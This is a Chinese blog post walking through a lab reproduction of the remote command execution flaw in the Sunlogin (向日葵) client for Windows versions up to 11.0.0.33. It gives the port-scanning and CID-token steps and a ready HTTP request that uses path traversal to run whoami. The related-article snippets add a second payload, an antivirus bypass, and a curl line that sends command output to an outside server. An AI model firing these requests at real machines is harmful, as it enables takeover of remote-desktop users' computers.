向日葵RCE命令执行(Windows <=11.0.0.33)

最新推荐文章于 2024-05-30 08:00:00 发布
最新推荐文章于 2024-05-30 08:00:00 发布
阅读量1.3w 收藏 10
点赞数 7
文章标签: windows 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52400001/article/details/122967456
版权

前言

向日葵个人版企业版均受影响 for Windows <=11.0.0.33

SunloginClient 启动后会在 40000 以上随机开放一个web端口,认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执行回显rce

一、话不多说开始复现

这里用的是 vm虚拟机安装的win10系统

1. 我们先安装漏洞版本的向日葵也就是<=11.0.0.33版本的,

2. 打开向日葵,连接服务器成功才可以哦

3. 打开之后会自动开启一个端口(40000-60000)之间随机的,我们扫描一下端口(先查看安装向日葵电脑的ip哦),我们扫出来的ip端口是50038

4. 验证是否端口可用(也就是使得否可以利用漏洞,看自己怎么理解了)

执行curl 192.168.236.128:50573(也就是curl ip:端口)

提示{"success":false,"msg":"Verification failure"}就是可以利用的

5. 我们使用EXP(python写的)获取Token get

这里用的是攻击机(也就是我的物理机)运行的脚本哦 

6. 这里有数据包(EXP)直接拿到BP上面去用就行,注意:我们获取到的Token get替换到数据包最后面CID=后面的内容

GET /check?cmd=ping../../../../../../../../../../../windows/system32/whoami HTTP/1.1
Host: 192.168.200.209:50915
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Cookie: CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
 

这里你的ip端口要改哦!

 

     到这里MHcloud又要和你们说再见了,没错他复现完成了,还是用的别人写的EXP,我不管,拿到了就是我的哈哈哈,不过还得感谢大佬写的EXP!!万分感谢!

本人理念:菜也要菜的理直气壮!!

MHcloud一个对网络安全充满憧憬的小菜鸡

 

 

 

 

MH cloud
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
pikachu靶场 :五、RCE
qq_43233085的博客
01-31 1105
pikachu靶场 :五、RCE 概述远程系统命令执行远程代码执行exec "ping"exec "eval" 概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操...
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
测试向日葵客户端漏洞版本:11.0.0.33826
03-05
测试向日葵客户端漏洞版本:11.0.0.33826
RCE:代码执行命令执行
最新发布
qq_68163788的博客
05-30 1184
RCE是一种严重的安全漏洞,允许攻击者通过远程方式执行恶意代码或命令在受感染的系统上。这种漏洞可以被利用来获取系统权限、窃取敏感数据、篡改网站内容或者在受感染系统上植入后门,从而使攻击者能够完全控制受感染系统。RCE的危害性极高,因为攻击者可以利用这种漏洞对系统进行广泛的破坏,甚至扩大攻击范围至整个网络。 RCE漏洞通常存在于网络应用程序、操作系统或者其他软件中,攻击者可以通过各种方式发现和利用这些漏洞。
CNVD-2022-10207:向日葵RCE
chang113的博客
06-20 4364
CNVD-2022-10207:向日葵RCE
向日葵RCE原理解析——基于逆向工程的静态分析技术
lmboss的博客
03-06 784
向日葵RCE原理解析——基于逆向工程的静态分析技术
向日葵远控rce复现
weixin_45794666的博客
02-24 2842
向日葵 POC ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami 端口扫描 首先扫描端口 获取sid 可以通过已知向日葵端口 + cgi-bin/rpc?action=verify-haras的拼接来获取CID的值。 此时的url: http://192.168.159.151:49197/cgi-bin/rpc?action=verify-haras 每次访问不一样,但是都可以用 dmP
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
一只爱吃橙子的羊
03-31 7218
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
向日葵RCE漏洞一键批量自己检测工具
02-25
然而,向日葵RCE漏洞是指向日葵软件中存在的特定远程代码执行漏洞,这可能导致恶意用户利用该漏洞对受影响的系统进行攻击。 描述中的“测试自己向日葵是否存在RCE漏洞”意味着存在一种工具,能够帮助用户快速检查...
网络攻防|一次实战中的向日葵 RCE Bypass 360
weixin_42282189的博客
07-03 1279
点击上方蓝字关注我们在做攻防项目的时候发现了一个外网的向日葵命令执行但由于存在杀软,无法执行命令下面就来说一下我是如何绕过杀软拿到shell的自己搭了一个虚拟机,也是存在漏洞的向日葵命令执行,环境配置和目标一样,但没装360(后面会说是如何获得目标系统信息的)开始测试,发现首先我通过向日葵和杀软允许的命令判断确认是存在命令执行漏洞的通过网上搜索各种文章,晓得是利用向日葵不禁止命令,然后通过进行目录穿越来执行任意命令的。目标机器上的杀软实际上是禁止调用和等危险的进程,其他exe程序并没有禁止所以我们可以利用或
向日葵RCE
m0_64338211的博客
03-01 2016
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现 1. 我们先安装漏洞版本的向日葵也就是<=11.0.0.33版本的, 2. 打开向日葵,连接服务器成功才可以 3. 打开之后会自动开启一个端口(40000-60000)之间随机的,我们扫描一下端口(查看安装向日葵电脑的ip) 4. 浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)一个一个端口尝试 5. 拿到CID-添加paylo..
开机自启动并关闭窗口(向日葵简约版)
qq_36514470的博客
06-18 7379
向日葵简约版能够自启动,启动后马上关闭窗口,到最小化托盘。
在检测RCE漏洞时,判断RCE利用成功的方式有哪些(无回显情况)
weixin_42478365的博客
10-09 2085
第一种使用curl: curl "xxx.xxx.xxx.xxx/$(uname -a | awk '{print $1}')" 这条命令拼接了两处,第一处便是curl下我的一个vps服务器的80端口,第二处是显示内核版本。从服务器的web日志文件中看下效果: 发现操作系统的版本被拼接输出到后面,在面对没有回显的RCE或者CSRF都可以使用这个技巧。 第二种:DNSlog windows: 操作系统 盲注方式 windows %variable% linux variable 反引号 此处使用公网一个
Linux之向日葵命令行版安装和使用
热门推荐
月生的静心苑
08-04 2万+
一、向日葵简介   向日葵是一款阳光的远程控制软件。您可在任何可连入互联网的地方,轻松访问和控制安装了向日葵客户端的设备,且目前支持电脑、手机等多种控制端的方式进行远控。支持通过电脑、手机或平板等多种控制方式进行远控,且还能进行远程文件传输、远程摄像头监控、远程管理等功能。向日葵支持window、macOS、android、IOS、linux环境,有安装版和绿色版,使用也非常方便简单,最重要的是还免费,是远程协助工作必备的一款工具软件。
向*葵远程代码执行(自己复现过程)
流浪法师的博客
02-25 5393
向日葵远程代码执行漏洞复现过程
向日葵SunLoginClient_10.5.0.29)RCE验证
柳似烟的专栏
02-18 7240
向日葵RCE远程命令执行
面试官问你SQL注入、XSS、文件上传、RCE远程命令执行漏洞如何进行回答
07-12
当面试官询问我SQL注入、XSS、文件上传以及RCE远程命令执行漏洞的相关知识时,你可以使用以下话术进行回答: 1. 面试官:请介绍一下SQL注入漏洞。 你:SQL注入是一种常见的web应用程序漏洞,攻击者通过在用户输入中插入恶意的SQL代码,成功绕过应用程序的输入验证,从而可以执行未经授权的数据库查询、修改或删除操作。为防止SQL注入攻击,我们需要对用户输入进行严格的验证和过滤,并使用参数化查询或预编译语句来防止恶意SQL代码的执行。 2. 面试官:请解释一下XSS漏洞。 你:XSS(跨站脚本)漏洞是一种允许攻击者将恶意脚本注入到web应用程序的漏洞。当用户浏览包含恶意脚本的页面时,这些脚本会在用户的浏览器上执行,导致攻击者能够窃取用户的登录凭证、修改页面内容或进行其他恶意操作。为了防止XSS攻击,我们需要对用户输入进行合适的验证和过滤,并使用安全的编码方式来输出数据,如HTML转义或使用Content Security Policy(CSP)来限制脚本的执行。 3. 面试官:请讲解一下文件上传漏洞。 你:文件上传漏洞是指在web应用程序中存在未正确验证用户上传文件的安全问题。攻击者可以通过上传带有恶意代码的文件,从而在服务器上执行恶意操作,如执行任意命令、获取敏感数据或远程控制服务器。为了防止文件上传漏洞,我们需要对用户上传的文件进行严格的验证和过滤,限制可上传文件的类型和大小,并在保存、读取和执行文件时采取适当的安全措施。 4. 面试官:请简要说明一下RCE远程命令执行漏洞。 你:RCE(远程命令执行)漏洞是一种允许攻击者在受影响的系统上执行任意命令的漏洞。攻击者通过利用应用程序中的安全漏洞,成功注入恶意代码并执行系统命令。这种漏洞可能导致攻击者完全控制受影响的系统,进行敏感数据的窃取、服务器崩溃等恶意行为。为了防止RCE漏洞,我们需要保持应用程序和服务器的补丁更新,进行输入验证和过滤,以及使用安全编码和访问控制机制来限制恶意代码的执行。 请记住,以上是对每种漏洞的简要解释,你可以根据自己的了解和经验进行适当的展开和补充。在回答问题时,尽量用简明扼要的语言表达,并展示你对漏洞原理和相关防御措施的深入理解。祝你面试顺利!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值